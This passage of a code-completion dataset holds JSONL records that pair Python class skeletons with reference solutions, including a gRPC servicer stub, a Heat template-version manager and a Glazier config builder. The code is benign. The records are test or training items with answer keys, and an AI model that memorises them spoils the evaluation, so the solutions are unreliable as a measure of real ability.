implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n\n<|body_start_2|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_2|>\n\n<|body_start_3|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000385", "length_bytes": 8348, "license_type": "permissive", "methods": [{"docstring": "Missing associated documentation comment in .proto file.", "name": "createAgent", "signature": "def createAgent(self, request, context)"}, {"docstring": "Missing associated documentation comment in .proto file.", "name": "updateAgent", "signature": "def updateAgent(self, request, context)"}, {"docstring": "Missing associated documentation comment in .proto file.", "name": "deleteAgent", "signature": "def deleteAgent(self, request, context)"}, {"docstring": "Missing associated documentation comment in .proto file.", "name": "getAgent", "signature": "def getAgent(self, request, context)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002112", "prompt": "Implement the Python class `AgentProfileServiceServicer` described below.\n\nClass description:\nMissing associated documentation comment in .proto file.\n\nMethod signatures and docstrings:\n- def createAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def updateAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def deleteAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def getAgent(self, request, context): Missing associated documentation comment in .proto file.", "prompted_full_text": "Implement the Python class `AgentProfileServiceServicer` described below.\n\nClass description:\nMissing associated documentation comment in .proto file.\n\nMethod signatures and docstrings:\n- def createAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def updateAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def deleteAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def getAgent(self, request, context): Missing associated documentation comment in .proto file.\n\n<|skeleton|>\nclass AgentProfileServiceServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def createAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def updateAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n def deleteAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_2|>\n\n def getAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n\n<|body_start_2|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_2|>\n\n<|body_start_3|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_3|>\n", "revision_id": "dc1ea0b58f92429ec8e7b54a8f23525abe024ba9", "skeleton": "<|skeleton|>\nclass AgentProfileServiceServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def createAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def updateAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n def deleteAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_2|>\n\n def getAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AgentProfileServiceServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def createAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def updateAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def deleteAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def getAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n", "source": "the_stack_v2_python_sparse", "source_path": "custos-client-sdks/custos-python-sdk/build/lib/custos/server/core/AgentProfileService_pb2_grpc.py", "source_repo": "apache/airavata-custos", "split": "test", "star_events_count": 12} {"blob_id": "4750b8551d1ecc2f703d6842c0e0e3949bd8549b", "bodies": ["url = '/template_versions'\nif response_key:\n return self._get(url, 'template_versions', **kwargs)\nelse:\n return self._get(url, **kwargs)", "url = '/template_versions/%s/functions' % template_version\nif response_key:\n return self._get(url, 'template_functions', **kwargs)\nelse:\n return self._get(url, **kwargs)"], "bodies_text": "<|body_start_0|>\n url = '/template_versions'\n if response_key:\n return self._get(url, 'template_versions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n url = '/template_versions/%s/functions' % template_version\n if response_key:\n return self._get(url, 'template_functions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "TemplateVersionManager", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TemplateVersionManager:\n\n def list(self, response_key=True, **kwargs):\n \"\"\"Get a list of template versions. :rtype: list of :class:`TemplateVersion`\"\"\"\n <|body_0|>\n\n def get(self, template_version, response_key=True, **kwargs):\n \"\"\"Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = '/template_versions'\n if response_key:\n return self._get(url, 'template_versions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n url = '/template_versions/%s/functions' % template_version\n if response_key:\n return self._get(url, 'template_functions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000386", "length_bytes": 874, "license_type": "no_license", "methods": [{"docstring": "Get a list of template versions. :rtype: list of :class:`TemplateVersion`", "name": "list", "signature": "def list(self, response_key=True, **kwargs)"}, {"docstring": "Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for", "name": "get", "signature": "def get(self, template_version, response_key=True, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006421", "prompt": "Implement the Python class `TemplateVersionManager` described below.\n\nClass description:\nImplement the TemplateVersionManager class.\n\nMethod signatures and docstrings:\n- def list(self, response_key=True, **kwargs): Get a list of template versions. :rtype: list of :class:`TemplateVersion`\n- def get(self, template_version, response_key=True, **kwargs): Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for", "prompted_full_text": "Implement the Python class `TemplateVersionManager` described below.\n\nClass description:\nImplement the TemplateVersionManager class.\n\nMethod signatures and docstrings:\n- def list(self, response_key=True, **kwargs): Get a list of template versions. :rtype: list of :class:`TemplateVersion`\n- def get(self, template_version, response_key=True, **kwargs): Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for\n\n<|skeleton|>\nclass TemplateVersionManager:\n\n def list(self, response_key=True, **kwargs):\n \"\"\"Get a list of template versions. :rtype: list of :class:`TemplateVersion`\"\"\"\n <|body_0|>\n\n def get(self, template_version, response_key=True, **kwargs):\n \"\"\"Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = '/template_versions'\n if response_key:\n return self._get(url, 'template_versions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n url = '/template_versions/%s/functions' % template_version\n if response_key:\n return self._get(url, 'template_functions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_1|>\n", "revision_id": "42f9197ba26ffb6b9dd336a524639ecbbf194365", "skeleton": "<|skeleton|>\nclass TemplateVersionManager:\n\n def list(self, response_key=True, **kwargs):\n \"\"\"Get a list of template versions. :rtype: list of :class:`TemplateVersion`\"\"\"\n <|body_0|>\n\n def get(self, template_version, response_key=True, **kwargs):\n \"\"\"Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TemplateVersionManager:\n def list(self, response_key=True, **kwargs):\n \"\"\"Get a list of template versions. :rtype: list of :class:`TemplateVersion`\"\"\"\n url = '/template_versions'\n if response_key:\n return self._get(url, 'template_versions', **kwargs)\n else:\n return self._get(url, **kwargs)\n\n def get(self, template_version, response_key=True, **kwargs):\n \"\"\"Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for\"\"\"\n url = '/template_versions/%s/functions' % template_version\n if response_key:\n return self._get(url, 'template_functions', **kwargs)\n else:\n return self._get(url, **kwargs)\n", "source": "the_stack_v2_python_sparse", "source_path": "ops_client/project/heat/template_versions.py", "source_repo": "tokuzfunpi/ops_client", "split": "test", "star_events_count": 0} {"blob_id": "f8e08dd6d52334332dcaaee8fca3fe55309bf68c", "bodies": ["self._task_list = []\nwhile True:\n try:\n self._Start(in_path, in_file)\n break\n except actions.ServerChangeEvent:\n in_path = ''\ntry:\n files.Dump(out_file, self._task_list, mode='a')\nexcept files.Error as e:\n raise ConfigBuilderError() from e", "self._build_info.ActiveConfigPath(append=conf_path.rstrip('/'))\ntry:\n path = download.PathCompile(self._build_info, file_name=conf_file)\n yaml_config = files.Read(path)\nexcept (files.Error, buildinfo.Error) as e:\n raise ConfigBuilderError() from e\ntimer_start = 'start_{}_{}'.format(conf_path.rstrip('/'), conf_file)\nactive_path = copy.deepcopy(self._build_info.ActiveConfigPath())\nself._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_start]}})\ncontrols = yaml_config['controls']\ntry:\n for control in controls:\n if 'pin' not in control or self._MatchPin(control['pin']):\n self._StoreControls(control, yaml_config.get('templates'))\nfinally:\n timer_stop = 'stop_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_stop]}})\nself._build_info.ActiveConfigPath(pop=True)", "for pin in pins:\n try:\n if not self._build_info.BuildPinMatch(pin, pins[pin]):\n return False\n except buildinfo.Error as e:\n raise SysInfoError() from e\nreturn True", "for element in control:\n if element == 'pin':\n continue\n elif element == 'template':\n for template in control['template']:\n self._StoreControls(templates[template], templates)\n elif element == 'include':\n for sub_inc in control['include']:\n self._Start(conf_path=sub_inc[0], conf_file=sub_inc[1])\n elif element in _ALLOW_IN_CONTROL:\n if self._IsRealtimeAction(element, control[element]):\n self._ProcessAction(element, control[element])\n else:\n self._task_list.append({'path': copy.deepcopy(self._build_info.ActiveConfigPath()), 'data': {element: control[element]}})\n else:\n raise UnknownActionError(str(element))"], "bodies_text": "<|body_start_0|>\n self._task_list = []\n while True:\n try:\n self._Start(in_path, in_file)\n break\n except actions.ServerChangeEvent:\n in_path = ''\n try:\n files.Dump(out_file, self._task_list, mode='a')\n except files.Error as e:\n raise ConfigBuilderError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n self._build_info.ActiveConfigPath(append=conf_path.rstrip('/'))\n try:\n path = download.PathCompile(self._build_info, file_name=conf_file)\n yaml_config = files.Read(path)\n except (files.Error, buildinfo.Error) as e:\n raise ConfigBuilderError() from e\n timer_start = 'start_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n active_path = copy.deepcopy(self._build_info.ActiveConfigPath())\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_start]}})\n controls = yaml_config['controls']\n try:\n for control in controls:\n if 'pin' not in control or self._MatchPin(control['pin']):\n self._StoreControls(control, yaml_config.get('templates'))\n finally:\n timer_stop = 'stop_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_stop]}})\n self._build_info.ActiveConfigPath(pop=True)\n<|end_body_1|>\n\n<|body_start_2|>\n for pin in pins:\n try:\n if not self._build_info.BuildPinMatch(pin, pins[pin]):\n return False\n except buildinfo.Error as e:\n raise SysInfoError() from e\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n for element in control:\n if element == 'pin':\n continue\n elif element == 'template':\n for template in control['template']:\n self._StoreControls(templates[template], templates)\n elif element == 'include':\n for sub_inc in control['include']:\n self._Start(conf_path=sub_inc[0], conf_file=sub_inc[1])\n elif element in _ALLOW_IN_CONTROL:\n if self._IsRealtimeAction(element, control[element]):\n self._ProcessAction(element, control[element])\n else:\n self._task_list.append({'path': copy.deepcopy(self._build_info.ActiveConfigPath()), 'data': {element: control[element]}})\n else:\n raise UnknownActionError(str(element))\n<|end_body_3|>\n", "class_docstring": "Builds the complete task list for the installation.", "class_name": "ConfigBuilder", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ConfigBuilder:\n \"\"\"Builds the complete task list for the installation.\"\"\"\n\n def Start(self, out_file, in_path, in_file='build.yaml'):\n \"\"\"Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\"\"\"\n <|body_0|>\n\n def _Start(self, conf_path, conf_file):\n \"\"\"Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\"\"\"\n <|body_1|>\n\n def _MatchPin(self, pins):\n \"\"\"Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\"\"\"\n <|body_2|>\n\n def _StoreControls(self, control, templates):\n \"\"\"Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._task_list = []\n while True:\n try:\n self._Start(in_path, in_file)\n break\n except actions.ServerChangeEvent:\n in_path = ''\n try:\n files.Dump(out_file, self._task_list, mode='a')\n except files.Error as e:\n raise ConfigBuilderError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n self._build_info.ActiveConfigPath(append=conf_path.rstrip('/'))\n try:\n path = download.PathCompile(self._build_info, file_name=conf_file)\n yaml_config = files.Read(path)\n except (files.Error, buildinfo.Error) as e:\n raise ConfigBuilderError() from e\n timer_start = 'start_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n active_path = copy.deepcopy(self._build_info.ActiveConfigPath())\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_start]}})\n controls = yaml_config['controls']\n try:\n for control in controls:\n if 'pin' not in control or self._MatchPin(control['pin']):\n self._StoreControls(control, yaml_config.get('templates'))\n finally:\n timer_stop = 'stop_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_stop]}})\n self._build_info.ActiveConfigPath(pop=True)\n<|end_body_1|>\n\n<|body_start_2|>\n for pin in pins:\n try:\n if not self._build_info.BuildPinMatch(pin, pins[pin]):\n return False\n except buildinfo.Error as e:\n raise SysInfoError() from e\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n for element in control:\n if element == 'pin':\n continue\n elif element == 'template':\n for template in control['template']:\n self._StoreControls(templates[template], templates)\n elif element == 'include':\n for sub_inc in control['include']:\n self._Start(conf_path=sub_inc[0], conf_file=sub_inc[1])\n elif element in _ALLOW_IN_CONTROL:\n if self._IsRealtimeAction(element, control[element]):\n self._ProcessAction(element, control[element])\n else:\n self._task_list.append({'path': copy.deepcopy(self._build_info.ActiveConfigPath()), 'data': {element: control[element]}})\n else:\n raise UnknownActionError(str(element))\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000387", "length_bytes": 7079, "license_type": "permissive", "methods": [{"docstring": "Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.", "name": "Start", "signature": "def Start(self, out_file, in_path, in_file='build.yaml')"}, {"docstring": "Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.", "name": "_Start", "signature": "def _Start(self, conf_path, conf_file)"}, {"docstring": "Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.", "name": "_MatchPin", "signature": "def _MatchPin(self, pins)"}, {"docstring": "Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.", "name": "_StoreControls", "signature": "def _StoreControls(self, control, templates)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_005082", "prompt": "Implement the Python class `ConfigBuilder` described below.\n\nClass description:\nBuilds the complete task list for the installation.\n\nMethod signatures and docstrings:\n- def Start(self, out_file, in_path, in_file='build.yaml'): Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\n- def _Start(self, conf_path, conf_file): Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\n- def _MatchPin(self, pins): Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\n- def _StoreControls(self, control, templates): Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.", "prompted_full_text": "Implement the Python class `ConfigBuilder` described below.\n\nClass description:\nBuilds the complete task list for the installation.\n\nMethod signatures and docstrings:\n- def Start(self, out_file, in_path, in_file='build.yaml'): Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\n- def _Start(self, conf_path, conf_file): Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\n- def _MatchPin(self, pins): Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\n- def _StoreControls(self, control, templates): Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.\n\n<|skeleton|>\nclass ConfigBuilder:\n \"\"\"Builds the complete task list for the installation.\"\"\"\n\n def Start(self, out_file, in_path, in_file='build.yaml'):\n \"\"\"Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\"\"\"\n <|body_0|>\n\n def _Start(self, conf_path, conf_file):\n \"\"\"Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\"\"\"\n <|body_1|>\n\n def _MatchPin(self, pins):\n \"\"\"Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\"\"\"\n <|body_2|>\n\n def _StoreControls(self, control, templates):\n \"\"\"Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._task_list = []\n while True:\n try:\n self._Start(in_path, in_file)\n break\n except actions.ServerChangeEvent:\n in_path = ''\n try:\n files.Dump(out_file, self._task_list, mode='a')\n except files.Error as e:\n raise ConfigBuilderError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n self._build_info.ActiveConfigPath(append=conf_path.rstrip('/'))\n try:\n path = download.PathCompile(self._build_info, file_name=conf_file)\n yaml_config = files.Read(path)\n except (files.Error, buildinfo.Error) as e:\n raise ConfigBuilderError() from e\n timer_start = 'start_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n active_path = copy.deepcopy(self._build_info.ActiveConfigPath())\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_start]}})\n controls = yaml_config['controls']\n try:\n for control in controls:\n if 'pin' not in control or self._MatchPin(control['pin']):\n self._StoreControls(control, yaml_config.get('templates'))\n finally:\n timer_stop = 'stop_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_stop]}})\n self._build_info.ActiveConfigPath(pop=True)\n<|end_body_1|>\n\n<|body_start_2|>\n for pin in pins:\n try:\n if not self._build_info.BuildPinMatch(pin, pins[pin]):\n return False\n except buildinfo.Error as e:\n raise SysInfoError() from e\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n for element in control:\n if element == 'pin':\n continue\n elif element == 'template':\n for template in control['template']:\n self._StoreControls(templates[template], templates)\n elif element == 'include':\n for sub_inc in control['include']:\n self._Start(conf_path=sub_inc[0], conf_file=sub_inc[1])\n elif element in _ALLOW_IN_CONTROL:\n if self._IsRealtimeAction(element, control[element]):\n self._ProcessAction(element, control[element])\n else:\n self._task_list.append({'path': copy.deepcopy(self._build_info.ActiveConfigPath()), 'data': {element: control[element]}})\n else:\n raise UnknownActionError(str(element))\n<|end_body_3|>\n", "revision_id": "ec44cb163f54d1393b0a2c2730d5d0d9d0fc8515", "skeleton": "<|skeleton|>\nclass ConfigBuilder:\n \"\"\"Builds the complete task list for the installation.\"\"\"\n\n def Start(self, out_file, in_path, in_file='build.yaml'):\n \"\"\"Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\"\"\"\n <|body_0|>\n\n def _Start(self, conf_path, conf_file):\n \"\"\"Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\"\"\"\n <|body_1|>\n\n def _MatchPin(self, pins):\n \"\"\"Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\"\"\"\n <|body_2|>\n\n def _StoreControls(self, control, templates):\n \"\"\"Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ConfigBuilder:\n \"\"\"Builds the complete task list for the installation.\"\"\"\n\n def Start(self, out_file, in_path, in_file='build.yaml'):\n \"\"\"Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\"\"\"\n self._task_list = []\n while True:\n try:\n self._Start(in_path, in_file)\n break\n except actions.ServerChangeEvent:\n in_path = ''\n try:\n files.Dump(out_file, self._task_list, mode='a')\n except files.Error as e:\n raise ConfigBuilderError() from e\n\n def _Start(self, conf_path, conf_file):\n \"\"\"Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\"\"\"\n self._build_info.ActiveConfigPath(append=conf_path.rstrip('/'))\n try:\n path = download.PathCompile(self._build_info, file_name=conf_file)\n yaml_config = files.Read(path)\n except (files.Error, buildinfo.Error) as e:\n raise ConfigBuilderError() from e\n timer_start = 'start_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n active_path = copy.deepcopy(self._build_info.ActiveConfigPath())\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_start]}})\n controls = yaml_config['controls']\n try:\n for control in controls:\n if 'pin' not in control or self._MatchPin(control['pin']):\n self._StoreControls(control, yaml_config.get('templates'))\n finally:\n timer_stop = 'stop_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_stop]}})\n self._build_info.ActiveConfigPath(pop=True)\n\n def _MatchPin(self, pins):\n \"\"\"Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\"\"\"\n for pin in pins:\n try:\n if not self._build_info.BuildPinMatch(pin, pins[pin]):\n return False\n except buildinfo.Error as e:\n raise SysInfoError() from e\n return True\n\n def _StoreControls(self, control, templates):\n \"\"\"Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.\"\"\"\n for element in control:\n if element == 'pin':\n continue\n elif element == 'template':\n for template in control['template']:\n self._StoreControls(templates[template], templates)\n elif element == 'include':\n for sub_inc in control['include']:\n self._Start(conf_path=sub_inc[0], conf_file=sub_inc[1])\n elif element in _ALLOW_IN_CONTROL:\n if self._IsRealtimeAction(element, control[element]):\n self._ProcessAction(element, control[element])\n else:\n self._task_list.append({'path': copy.deepcopy(self._build_info.ActiveConfigPath()), 'data': {element: control[element]}})\n else:\n raise UnknownActionError(str(element))\n", "source": "the_stack_v2_python_sparse", "source_path": "glazier/lib/config/builder.py", "source_repo": "google/glazier", "split": "test", "star_events_count": 1311} {"blob_id": "48505463af0fc4fa9e477daae3a01830a30ac4e2", "bodies": ["super().__init__(path)\nself._bug_list = dict()\nself._parse()", "if self._bug_list != other._bug_list:\n print('Bug lists do not match.')\n return False\nreturn True", "with open(self._path, 'r') as file:\n try:\n line = file.readline()\n while line:\n if line.startswith(BUG_START):\n line = file.readline()\n if line:\n bug_type = line.split(' ', 1)[0]\n if bug_type not in self._bug_list:\n self._bug_list[bug_type] = []\n reproduced = 'Bug was reproduced' in line\n line = file.readline()\n if line.startswith('Attempted'):\n line = file.readline()\n bug_hash = line.split(' ')[-1].rstrip()\n line = file.readline()\n seq = ParsedSequence([])\n while line and (not line.startswith(BUG_START)):\n seq += self._get_request(line)\n line = file.readline()\n self._bug_list[bug_type].append((seq, reproduced, bug_hash))\n else:\n line = file.readline()\n except Exception as err:\n print(f'Failed to read bug log. Log was not a complete test log.\\n{err!s}')\n raise TestFailedException"], "bodies_text": "<|body_start_0|>\n super().__init__(path)\n self._bug_list = dict()\n self._parse()\n<|end_body_0|>\n\n<|body_start_1|>\n if self._bug_list != other._bug_list:\n print('Bug lists do not match.')\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n with open(self._path, 'r') as file:\n try:\n line = file.readline()\n while line:\n if line.startswith(BUG_START):\n line = file.readline()\n if line:\n bug_type = line.split(' ', 1)[0]\n if bug_type not in self._bug_list:\n self._bug_list[bug_type] = []\n reproduced = 'Bug was reproduced' in line\n line = file.readline()\n if line.startswith('Attempted'):\n line = file.readline()\n bug_hash = line.split(' ')[-1].rstrip()\n line = file.readline()\n seq = ParsedSequence([])\n while 